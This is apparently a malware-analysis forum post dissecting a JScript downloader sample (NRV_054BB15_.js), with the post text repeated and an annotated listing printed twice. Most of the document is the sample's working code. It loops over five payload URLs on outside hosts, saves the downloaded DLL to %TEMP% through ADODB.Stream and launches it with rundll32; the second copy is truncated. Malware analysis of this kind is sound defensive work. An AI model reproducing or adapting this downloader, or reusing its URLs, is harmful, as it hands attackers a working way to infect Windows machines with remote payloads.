From https://malwaretips.com/threads/08-11-2016-4.65237/
Thanks to @Daniel Hidalgo
NRV_054BB15_.js
Why this sample ?
I think that my numerous children penguins at home could have made the same level of protection
I will show you an example of what must not be used on a script...
All AV tools that don't detect it at static / heuristic scan could be criticized
9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100
1) What It looks like :
You really must look at the spoiler part
:
some parts :
// Excerpt of three consecutive assignments from the sample, shown to illustrate that every
// value is in the clear: only the identifiers are obfuscated (long random letter/digit names).
// "437" is never read anywhere in the full listing - presumably padding.
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
// WScript.Shell, used for environment-variable expansion and later to launch rundll32.exe.
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
// %TEMP% is the directory where the downloaded DLL is dropped.
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
2-2) A quick look at the code gives us a lot of info :
2-3) Replacement of variable names :
A very easy to understand script, the only obfuscation being very long variable names made of random letters.
From :
The first URL that works is used to download a file :
Very easy method used....
A very good example to start teaching malware scripts to your children ...
Thanks to @Daniel Hidalgo
NRV_054BB15_.js
Why this sample ?
I think that my numerous children penguins at home could have made the same level of protection
I will show you an example of what must not be used on a script...
All AV tools that don't detect it at static / heuristic scan could be criticized
9/54
https://www.hybrid-analysis.com/sam...ecb4283681c611b19c41897377e?environmentId=100
1) What It looks like :
You really must look at the spoiler part
// Analyst annotations: a plain JScript downloader. Obfuscation is limited to the long random
// identifiers; every ProgID, URL, path and rundll32 argument is in the clear.
// Observable chain on an endpoint: wscript.exe makes HTTP requests, writes a .dll under %TEMP%,
// then spawns rundll32.exe with "<dll path>,woody".
// Candidate payload locations (defanged "http ://" as posted), tried in order by the second loop.
TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2 = ["http ://henanbusiness.net/xzwl8m2b", "http ://himichesko-varna.com/fzqrolxe", "http ://fototour.pl/hv9wgx80", "http ://choopchirk.net/349u8", "http ://rokematin.com/3ekauq6y"];
// File-name stem of the dropped DLL.
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";
// ADODB.Stream type 1 = adTypeBinary: the response body is written as raw bytes.
var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;
// Never read again in this listing - presumably padding.
var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;
// SaveToFile option 2 = adSaveCreateOverWrite: an existing file is overwritten.
var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;
// Never read again in this listing - presumably padding.
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
// WScript.Shell: environment expansion now, process launch (Run) at the end.
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
// Drop directory: %TEMP% (with a trailing forward slash, as written).
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
// <%TEMP%>/<stem>
var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;
// Full drop path <%TEMP%>/<stem>.dll; ".dll" is split into ".d" + "ll", presumably to dodge naive string matching.
var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";
// System environment block, queried below for the CPU architecture.
var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");
// On a 64-bit Windows (amd64) use the 32-bit rundll32 from SysWOW64, otherwise the System32 one.
// The same variable is declared in both branches; JScript hoists `var`, so that is harmless.
if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
// Two HTTP-capable COM ProgIDs; the loop keeps the first one that can be instantiated.
var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)
{
try
{
// Stop at the first ProgID that can be created.
var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);
break;
} catch (e)
{
// A missing or blocked ProgID throws: swallow it and try the next one.
// If neither works the HTTP object stays undefined and every iteration of the next loop
// ends in its catch, so the script exits silently through the final Quit.
continue;
}
};
// FileSystemObject, used only to obtain the 8.3 short path of the dropped file.
var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");
// Never read again in this listing - presumably padding.
var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;
// Try each URL in order; the first successful download-and-run ends the script (Quit inside the try).
for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)
{
try
{
// Synchronous GET (third argument false).
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();
// Poll every 100 ms until the request reports complete (readyState 4).
while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);
// Binary ADODB.Stream: write the raw response body and save it as the .dll (overwrite).
var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();
// 8.3 short path of the dropped file, presumably so the rundll32 command line needs no quoting.
var Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7 = XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9.GetFile(XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5);
var JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 = Ei7n7p2z6e0y7t7a4s3b4n9z5z2t8d3u2e8k1b5i5j7c2d3p9c6m4z6a8n4o9r4b3v0g7u2n0o1e1b7o3z9y7j6o3g9c7s6r9e2d7.ShortPath;
// Execute the payload: rundll32.exe <short path>,woody - "woody" is the DLL export rundll32 calls.
GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0["Run"](YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 + " " + JBi4d1w3e7n3u3e9f1a1v0k2x9h2y6p2m1l8x4n4z8a5u6a4s7y6u9t8e5l6n6g0u1m6h5s7i9j8s8y5z4i7p3o2b4r2y3v9i7o3z5 + ",woody");
// Exit as soon as one payload has been launched.
WScript.Quit(0);
} catch (e) {
// Any failure (name resolution, HTTP error, write error, ...) falls through to the next URL.
continue;
};
}
// Reached only if no URL produced a runnable file.
WScript.Quit(0);
// Second copy of the same listing as posted (the forum spoiler was repeated on extraction).
// It starts at the file-name line: the URL array indexed by the download loop below
// (TAo3d8h1r5...v7a2) is not declared in this copy, so on its own this fragment would never
// download anything; see the first copy for the URL list and line-by-line notes.
KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6 = "r3wZioifc";
// ADODB.Stream type 1 = adTypeBinary.
var Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2 = 1;
// Unused in this listing.
var Ya2c7p7u5v1j6w4b7z4e3p6q1s6x8c6g2q2w7y9v3g8c0u5l1e9t1g4t9r0z8h5n6d6t6l0f8a1h5d7e2k4p1u1y1i3y2j5z2j0f7 = 2;
// SaveToFile option 2 = adSaveCreateOverWrite.
var EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8 = 2;
// Unused in this listing.
var Pp3m5m1i5p3f1x1x3y6i0d6z2i1n0o1r5m4h7i2q8h9e3i5d0g6l8j6i1n2t0w7b4g8m0j6z9n3i5d2s0c7z5d7w2o8m7v2r7h0h2 = "437";
var GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0 = WScript["CreateObject"]("WScript.Shell");
// Drop path: <%TEMP%>/<stem>.dll (".dll" split into ".d" + "ll").
var DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%TEMP%/");
var WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 = DFq1l1o6e2x7p4g5b1t4d7j8p8m5i0k2u0p8k4c1y0p3d1e8k6s0c4a2i9n6e7h7m1u3n4m9q9b5k2r1r6l9b8c6d4j0s5z3h4n9w7 + KVe3q3z5t8e5r8q7v1j1a2x6v8k8o7b3t0h5j6x7r8d5w3m3q5q5j1d2r5d6e4o3v7i7u6o7c5i4t6b7h6e6k6w5b5l3h5b1u5f9h6;
var XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5 = WCp9s5f3z3o6u2p8v3m6o3i8n7m0a3t0r1c5r1v6k1w2h7b2m9b3b6m5b1x6o7i6s5m5o0d5m0f3o3s6l5q3u0h7r1s0n0w5b7w2e2 + ".d" + "ll";
// Pick the 32-bit rundll32 (SysWOW64) on amd64, System32 otherwise.
var LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.Environment("System");
if (LRa3w7w2h4k0n8j3u1c5v9o5b9k8e2k7q3h1z9a1s4h6s0s7l1l2h9n6x2d3h5x5j4l3t8k9a0a3s0l7l4b4z6o4i4i2v1q7d0u7d5("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64")
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} else
{
var YDm0u2f4w1o5c0d0a7k9t9v2e0o9f1f1y9j8a9v4q7p5z4x9j4m5r2l6q9f7u8m1s1x8b6q8f4g3v2i3s5e6t5n5u4l4d6l7i4j5d8 = GJp3b4r3u3d9c9k9k9k4f3i4i1f8p6c3l4f3v1g7y7c4k3c5q7y2q0a9f5g3u5f8p6f1c9b6z2f3k3s7l0c4j2k8b4v2i3k8f6l9h0.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}
// First HTTP ProgID that instantiates wins.
var NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5 = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];
for (var TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 = 0; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4 < NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5["length"]; TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4++)
{
try
{
var Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0 = WScript["CreateObject"](NMc9b1f9x4d9m9y6v9f1v7q2o9d6k1m7p5q9h4x8n9q1i6i1e1r4i3p0n9d3k5b6l7f0t1q8g4s3i9e5g6m4c0u1e8b6k1d3m4u6c5[TAf0c3h4t0d6r9s9s1p3v0n9p6m9m0w9n7s7n3s6h8a0y5f9q1q4c9v7h7h6l7v6m6u8i6m2u5t0r6u7q8t4q4t9i9c7f7z7u0c5u4]);
break;
} catch (e)
{
continue;
}
};
var XCh8h9c3z2x0q1h8t4x3o7v6c6s2t5u1y9p7d2f8a9y7k7r6q5c0g5p4t9q1h9v5a9z0g7q0x2b7k7i4b7r8u0f0f0e5p5t6e2u5w9 = new ActiveXObject("Scripting.FileSystemObject");
// Unused in this listing.
var Ya3e8q6b2p9n4v0x8t1n0f8h4i0x1x5f0r4n9v4j6o3e3v2i3l0v5g3h0u8b1n7x2x1u7q7f1r1t1s6k5d3w6z9p7w1v1f6c5n9y0 = 0;
// Per URL: synchronous GET, poll to completion, save the body as the .dll, run it via rundll32, quit.
for (var Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = 0; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 < TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2.length; Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 = Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7 + 1)
{
try
{
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["open"]("GET", TAo3d8h1r5p5f8o7g0o9f2k6d7v9v8r9g5y0p7b1q0i8i1x1f8j1u5t3o3b9y6i7o4o7u7r7i1t6a3r3e3j7f7p0n2v4n9x3g4v7a2[Qg6f9k8z9t8g0c2u2a9d3k8m9l3z0v6b1u2n1h4g4h5x7e2v8t7h2v7e8s6t1y6n6f7l2q1s0a7j4p1e6c6a5y2i7f5p8r6z6p0x7], false);
Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["send"]();
while (Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0.readystate < 4) WScript["Sleep"](100);
var TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8 = WScript["CreateObject"]("ADODB.Stream");
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["open"]();
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["type"] = Cd0l2n7x7r4i2q5h3k1f7k4f9b5l2s9u3b5c2j2t6i4k0o2p4c4h6z5k0m0m9g9i3z5e6u8q5i7d3z1p0i4e8n6s0l1z0r5j7e6i2;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["write"](Gn9y2o7v9p3x9z9l4b0v2c9k7v0i0t2a0u5g3z8t7x0c7y7p0k2c4d1h9m8p6s6e1k1j4f4h2x5x0w5k3e8a3s0v6r6w4a9j8z8p0["ResponseBody"]);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["position"] = 0;
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["SaveToFile"](XBh1v8v6g5u4g4y0q5d4r8h7o5a2h7g8b4n0n3y7t3b0x7x8p0d0p8m4c8u3s4p9r9w6m6m8r9b5p1q1i8a6u8c0a7y6h2e9y3f4h5, EXs2h3a9x0j3y2d1j5k3c3q4e7o4o9m8j9j3o9i2m6i0f2x0h0g9a5n4o2x4j2f2t0v6u9m0l0w7y7o2i5m2p5b9p6h8r4m8a9p3p8);
TBa8v5l6j6z7g7j7h1s2q2n0f0x4u4f6r9x7z8g9k7m5i9k0p2v0j8d1r2i9p6c0d1h3s1j8l5r1m6s9t5g2u2x2f4r4s7k5w0q1x8["close"]();
